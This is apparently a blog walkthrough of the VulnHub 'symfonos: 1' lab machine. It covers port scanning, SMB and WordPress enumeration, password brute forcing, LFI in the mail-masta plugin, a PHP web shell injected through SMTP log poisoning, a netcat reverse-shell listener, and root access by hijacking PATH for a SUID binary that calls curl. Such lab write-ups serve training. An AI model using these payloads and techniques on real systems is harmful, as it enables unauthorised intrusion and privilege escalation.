VulnHub: symfonos: 1

ratiros01
7 min readMay 11, 2021

--

Initial foothold

  1. Network discovery
nmap -sn 192.168.60.128/24

My target is 192.168.60.131.

2. Port scan

nmap -Pn 192.168.60.131nmap -Pn -p1000- 192.168.60.131

There’re 5 open ports: 22, 25, 80, 139 and 445.

3. OS and service scan

nmap -A -p22,25,80,139,445 192.168.60.131

There’re 4 services as listed:

  • 22/tcp ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
  • 25/tcp smtp Postfix smtpd
  • 80/tcp http Apache httpd 2.4.25 ((Debian))
  • 139/tcp and 445/tcp netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)

4. Vuln scan

nmap --script -p22,25,80,139,445 192.168.60.131

There’s is directory discovered on HTTP port 80.

Service Enumeration

  1. Starting w/ SSH connection om port 22
ssh 192.168.60.131

Connection verified

2. Connect to SMTP on port 25

telnet 192.168.131.60 25

Connection verified

3. nikto scan on HTTP

nikto -h http://192.168.131.60

More directory to explore

4. Directory scan w/ gobuster, I used 3 different wordlists.

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.60.131/ -x php,txt,html,sh,cgi,bak -qgobuster dir --wordlist /usr/share/dirb/wordlists/big.txt -u http://192.168.60.131/ -x php,txt,html,sh,cgi,bak -qgobuster dir --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://192.168.60.131/ -x php,txt,html,sh,cgi,bak -q

4. Access the site, explore every possible pages, not much of information revealed.

5. Scan SMB (port 139,445) w/ nmap

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 192.168.60.131

There’re anonymous and helios directories.

6. Access SMB:anonymous directory

smbclient //192.168.60.131/anonymousdir

There’s attention.txt

Download and read it

get attention.txtexitcat attention.txt

It’s a password hint.

Save these passwords as ‘pass_from_smb.txt’

Now I know that there’s username:helios and 3 possible passwords.

7. Access SMB:helios directory, It’s not available for anyone. I’ll try to access w/ username:helios

smbclient //192.168.60.131/helios -U heliospassword: epidoko -> failedpassword: qwerty -> succeededdir

Download them

get research.txtget todo.txtexit

Read them

cat research.txtcat todo.txt

There’s string “/h3l105/”. My guess, it’s a hidden directory on HTTP service.

8. Access http://192.168.60.131/h3l105/

It’s a WordPress site.

View page source, there’s “symfonol.local” hostname.

Edit /etc/hosts by adding IP and name

nano /etc/hosts

Refresh HTTP site, now It’s pretty.

9. Enumerate http://symfonos.local/h3l105/, not much on the site.

nikto scan

nikto -h http://symfonos.local/h3l105/

Directory scan

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://symfonos.local/h3l105/ -x php,txt,html,sh,cgi,bak -qgobuster dir --wordlist /usr/share/dirb/wordlists/big.txt -u http://symfonos.local/h3l105/ -x php,txt,html,sh,cgi,bak -qgobuster dir --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://symfonos.local/h3l105/ -x php,txt,html,sh,cgi,bak -q

10. Wordpress scan

wpscan --url http://symfonos.local/h3l105/ -et -ep -eu

Plugin scan

wpscan --url http://symfonos.local/h3l105/ --plugins-detection aggressive

Plugin: mail-masta v.1.0 has LFI vulnerability

11. WordPress password bruteforcing

wpscan --url http://symfonos.local/h3l105/ -et -ep -eu -P pass_from_smb.txt

No passwords found

Change wordlist to rockyou.txt

wpscan --url http://symfonos.local/h3l105/ -et -ep -eu -P /usr/share/wordlist/rockyou.txt

I will leave it to scan and checkback later.

Beautify the result by viewing page source

2. Since the machine has SMTP service which I can also access. I may able to access service’s related files.

Starting w/ “/var/log/mail.log”

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/log/mail.log

No result

Another possibility is helios’s mail, the path is “/var/mail/helios”

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios

I got the result. FromI can inject PHP shell to helios’s mail and acceed it w/ LFI.

3. Access SMTP service and inject the shell

telnet 192.168.60.131 25EHLO jckhmr
MAIL FROM: "jckhmr <?php echo shell_exec($_GET['cmd']);?>"

RCPT TO: helios

DATA

.

quit

4. Test the shell

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=id

Now, the shell is working as expected.

5. Reverse shell

Prepare listener

rlwrap nc -lvp 443

I will used commands from this cheatsheet.

After many tries, I succeeded w/ this command

Here’s how I did it.

Intercept LFI request w/ Burp Suite

Send the request to the Repeater

Encode reverse shell command to URL

Paste it to the request and send

Back to listener, now I got the shell.

Privilege Escalation

  1. Import TTY shell
python -c 'import pty;pty.spawn("/bin/bash");'

2. Explore the machine

cd /optls -la

I identified a binary called statuscheck

Run it

./statuscheck

3. I suspected that It must be SUID

find / -perm -u=s -type f 2>/dev/null

4. strings statuscheck to identify any command usage inside the binary

strings /opt/statuscheck

It calls “curl” command.

5. Create fake path of curl

cd /tmpecho /bin/sh > curlchmod 777 curlexport PATH=/tmp:$PATH/opt/statuscheckwhoami

Now I’m root.

6. Read the flag

cd /rootls -lacat proof.txt

--

--